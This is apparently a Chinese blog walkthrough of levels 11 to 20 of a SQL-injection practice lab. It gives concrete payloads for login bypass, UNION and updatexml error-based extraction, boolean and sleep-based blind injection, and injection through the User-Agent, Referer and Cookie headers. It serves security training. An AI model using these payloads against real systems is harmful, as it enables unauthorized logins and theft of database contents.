第十一关
这里是一个登录框
我们可以操作一下
猜想语句是这样的
select * from 数据库 where username=输入 password=输入 limit 0,1
那么我们在password后使用闭合符即可
s' or 1=1-- -
这么输入即可登录成功
根据他提供给我们的账号和密码,我们进行一些操作
用户这么输入,我们可以知道回显的列数是2列
Dumb' union select 1,2,3 -- -
那么联合注入就能这么用
11' union select 1,database() -- -
第十二关
首先随便输入一些闭合符号让他报错,发现闭合符号是("")
接着使用上一关的方法进行登录尝试
") or 1=1-- -
会发现好像不能用,最后使用报错注入能完成对这个关的一个sql注入点的发现
") and updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1=1-- -
第十三关
随便输入一个单引号,发现闭合符号是 ')
我们尝试使用联合注入等进行操作
发现即使我们的密码操作没问题就还是没办法得到一个正确的账号
那么我们尝试使用报错注入
') or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
成功
第十四关
我们随便输入一个双引号就报错了
那么我们就使用这个闭合符使用报错注入
" or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
第十五关
首先使用这个操作,这样的话就能得到我们的登陆操作
' or 1=1-- -
也是知道了登录成功的页面是什么
那么我们就能通过布尔盲注来一个一个找出数据库的名称等信息
' or substr((select database()),1,1)="s"-- -
第十六关
首先我们使用一个真言尝试注入,发现不能直接获得信息
") or if(1=1,sleep(5),1)-- -
然后就发现我们这样输入服务器会卡住,那么卡住的就是正确的
才怪嘞,这样就行了,只不过是服务器真卡了
这关和第十五关差不多,就是sql注入这里的闭合符号不一样
") or substr((select database()),1,1)="s"-- -
第十七关
使用的是报错注入奥
我发现,输入正确的账户的话没有问题
输入错误的密码却没有问题,这是因为这关是跟新密码的
我们输入正确的账号,在密码那里动手
密码输入
11' and if(1=1,sleep(5),1)-- -
注意,一定要有密码才行,要不然不更新密码
发现能成功睡着,那么就把if换成报错注入的函数看能不能能直接秒
秒了
aa' and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
第十八关
发现登录不管输入正确的还是错误的都会报错
那么就从那个ip address上动手
转了大半天,发现外面没有洞,sqlmap跑包也不行
我去第一关重新看账号密码发现原来上一关改密码是真改
输入正确的账号密码然后登录发现回显了useragent
对useragent动手
判断是insert语句,使用
',1,updatexml(1,concat(0x7e,(select database()),0x7e),1))#即可
第十九关
我们猜测跟上关一样,我们先登录下看看
果然,登录成功后回显了一个refer
我们对refer进行注入即可
Referer: ss',updatexml(1,concat(0x7e,(select database()),0x7e),1))#
这里要注意的是,我们的操作是insert,需要判断列数,我们通过几次尝试发现是插入2列
那么就这样写即可
第二十关
来到第二十关,我们先登录试试
登录进去发现有一个删除cookie的按键,那么显而易见,我们抓取包的时候对cookie进行注入即可
我们拦截这个请求包,并且拦截这个请求包的应答包,在那里能找到cookie
使用'发现正好
那么我们开始注入
Cookie: uname=Dumb' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
